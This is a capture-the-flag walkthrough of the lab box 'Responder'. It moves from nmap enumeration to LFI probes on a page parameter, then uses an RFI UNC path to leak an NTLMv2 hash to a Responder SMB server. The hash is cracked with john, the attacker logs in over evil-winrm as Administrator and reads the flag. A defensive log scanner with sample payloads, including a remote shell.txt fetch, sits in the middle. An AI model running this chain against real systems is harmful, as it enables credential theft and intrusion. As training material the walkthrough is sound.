04.RESPONDER (RFI, NTLM CAPTURE, PW CRACKING & WINRM)
Last updated
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
root@htb:~$ sudo nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
* '-sV' probes each open port for a banner and a version, but a banner alone
is not always enough to fingerprint what is actually running.
- adding -sC runs Nmap's default NSE scripts against every detected service
- the default set consists of "safe" scripts, which are designed to provide useful
information (headers, titles, OS hints) without being too intrusive or causing harm to the target systems.
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 80,5985
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
* the -sC flag runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
- here they reveal a Windows host running Apache/PHP on Win64 (an XAMPP stack) on port 80,
and Microsoft-HTTPAPI on 5985, which is the WinRM listener: worth remembering in case
credentials turn up later.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 80,5985
PORT STATE SERVICE
80/tcp open http
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
| /icons/: Potentially interesting folder w/ directory listing
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
| /inc/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.52 (win64) openssl/1.1.1m php/8.1.1'
5985/tcp open wsman
* --script=vuln runs the NSE scripts in the "vuln" category against the services on
ports 80 and 5985, looking for weak configurations and known vulnerabilities (CVEs)
in the detected versions.
- no hits only means none of the bundled checks matched, not that the service is fully
patched; here the notable output is the directory listings and TRACE being enabled,
and the real weakness (the page parameter) is only found by walking the application.
#walk the application and identify potential entry points
root@htb:~$ BROWSER > {targetIP:port}
* identified domain as unika.htb
root@htb:~$ echo "10.129.16.1 unika.htb" | sudo tee -a /etc/hosts
10.129.16.1 unika.htb
root@htb:~$ BROWSER > http://unika.htb
* possible vulnerable entry points
- contact web form
- could be vulnerable to XSS, etc
- page parameter
- could be vulnerable to LFI/RFI
#test for vulnerabilities: LFI/RFI
root@htb:~$ BROWSER > http://unika.htb/index.php?page=127.0.0.1
Warning: include(127.0.0.1): Failed to open stream: No such file or directory in C:\xampp\htdocs\index.php on line 11
Warning: include(): Failed opening '127.0.0.1' for inclusion (include_path='\xampp\php\PEAR') in C:\xampp\htdocs\index.php on line 11
* page errors could indicate the possibility of LFI: the include() warnings show the
parameter is passed straight to include() and leak the web root (C:\xampp\htdocs)
root@htb:~$ BROWSER > http://unika.htb/index.php?page=\Windows\System32\drivers\etc\hosts
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
* ALT: add path traversal in testing if the first method didn't work
- http://unika.htb/index.php?page=..\..\..\..\Windows\System32\drivers\etc\hosts
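A defender's view of the same probes, as an added example that is not part of the original notes: a Python scanner over Apache access-log lines that flags page= values shaped like the LFI payloads above (absolute Windows paths, ..\ traversal) and like the UNC and URL payloads an RFI attempt uses to make the server fetch a remote file. The log lines are constructed for this example in Apache's combined format; the parameter name "page" is the one from this target.

```python
import re
from typing import Iterable, List, Optional, Tuple
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Apache "combined"/"common" access-log line (XAMPP's default access.log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def classify_include_value(value: str) -> Optional[str]:
    """Label an include()-bound parameter value, or return None if it looks benign.

    Backslashes are normalised to '/' because PHP on Windows accepts both, and the
    value is URL-decoded once more to catch double-encoded payloads.
    """
    v = unquote_plus(value).replace("\\", "/")
    if re.match(r"^[a-z][a-z0-9+.-]*://", v, re.I):
        return "rfi-url"        # http://attacker/shell.txt (needs allow_url_include)
    if v.startswith("//"):
        return "rfi-unc"        # //10.10.14.215/somefile -> SMB fetch -> NTLMv2 leak
    if "../" in v:
        return "lfi-traversal"  # ..\..\..\..\Windows\System32\drivers\etc\hosts
    if re.match(r"^(/|[a-z]:/)", v, re.I):
        return "lfi-absolute"   # \Windows\System32\drivers\etc\hosts or C:\xampp\...
    return None

def scan_access_log(lines: Iterable[str], param: str = "page") -> List[Tuple[str, str, str, str]]:
    """Return (label, client_ip, timestamp, decoded_value) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not an access-log line; skip rather than crash
        query = urlsplit(m["path"]).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            label = classify_include_value(value)
            if label:
                findings.append((label, m["ip"], m["ts"], value))
    return findings

# Constructed sample log: the probes from this walkthrough as the target's Apache would log them.
SAMPLE_LOG = [
    '10.10.14.215 - - [21/Feb/2025:19:20:01 +0000] "GET /index.php?page=french.html HTTP/1.1" 200 5231',
    '10.10.14.215 - - [21/Feb/2025:19:21:10 +0000] "GET /index.php?page=127.0.0.1 HTTP/1.1" 200 412',
    '10.10.14.215 - - [21/Feb/2025:19:22:30 +0000] "GET /index.php?page=%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts HTTP/1.1" 200 824',
    '10.10.14.215 - - [21/Feb/2025:19:23:02 +0000] "GET /index.php?page=..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts HTTP/1.1" 200 824',
    '10.10.14.215 - - [21/Feb/2025:19:25:47 +0000] "GET /index.php?page=//10.10.14.215/somefile HTTP/1.1" 200 398',
    '10.10.14.215 - - [21/Feb/2025:19:26:05 +0000] "GET /index.php?page=http://10.10.14.215/shell.txt HTTP/1.1" 200 398',
]

if __name__ == "__main__":
    for label, ip, ts, value in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} {label:14} page={value}")
```

The bare-IP probe (page=127.0.0.1) is deliberately not flagged: on its own it is indistinguishable from a typo, and it is the first one an attacker sends. The UNC form is the one worth alerting on with the highest priority, because a single request is enough to leak the web server's NTLMv2 response to an attacker-controlled host.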
#set up a malicious smb server
root@htb:~$ which responder
/usr/sbin/responder
root@htb:~$ locate Responder.conf
/etc/responder/Responder.conf
/usr/share/responder/Responder.conf
root@htb:~$ cat /etc/responder/Responder.conf
[Responder Core]
; Servers to start
SQL = On
SMB = On
* ensure Responder is set to listen for SMB requests.
#start a malicious SMB server
root@htb:~$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.215 netmask 255.255.254.0 destination 10.10.14.215
root@htb:~$ sudo responder -I tun0
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
...
[+] Listening for events...
...
#capture ntlm/ntlmv2 challenge and response
root@htb:~$ BROWSER > http://unika.htb/index.php?page=//10.10.14.215/somefile
Warning: include(\\10.10.14.215\SOMEFILE): Failed to open stream: Permission denied in C:\xampp\htdocs\index.php on line 11
Warning: include(): Failed opening '//10.10.14.215/somefile' for inclusion (include_path='\xampp\php\PEAR') in C:\xampp\htdocs\index.php on line 11
* somefile doesn't exist on the attacker's SMB server, and doesn't need to:
- PHP's include() resolves the UNC path, and the web server process (running here
as the Administrator account) authenticates to the malicious SMB server with
NTLMv2 in order to fetch "somefile"
- Responder completes the challenge/response exchange, logs the NTLMv2 hash, and
then rejects the session, which is why PHP reports "Permission denied"
* ALT:
- host a PHP file on the attacker's share instead and include it the same way:
include() executes whatever it fetches, turning the RFI into RCE
RESPONDER...
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.16.1
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:a94235c50a1196f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
* captured challenge/response from the target which was trying to connect
to the malicious smb server from the attacker
#crack captured challenge/response hash
root@htb:~$ echo "Administrator::RESPONDER:a94235c50a1196f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" | tee -a target.txt
root@htb:~$ locate rockyou.txt
/usr/share/wordlists/rockyou.txt
root@htb:~$ cp /usr/share/wordlists/rockyou.txt .
root@htb:~$ john -w=rockyou.txt target.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
badminton (Administrator)
1g 0:00:00:00 DONE (2025-02-21 19:36) 100.0g/s 409600p/s 409600c/s 409600C/s slimshady..oooooo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
#connect to the target with the obtained credentials
root@htb:~$ which evil-winrm
/usr/bin/evil-winrm
root@htb:~$ evil-winrm -i 10.129.16.1 -u administrator -p badminton
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completio
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir c:\users\
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/9/2022 5:35 PM Administrator
d----- 3/9/2022 5:33 PM mike
d-r--- 10/10/2020 12:37 PM Public
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir c:\users\mike\desktop
Directory: C:\users\mike\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/10/2022 4:50 AM 32 flag.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type c:\users\mike\desktop\flag.txt
ea81b7afddd03efaa0945333ed147fac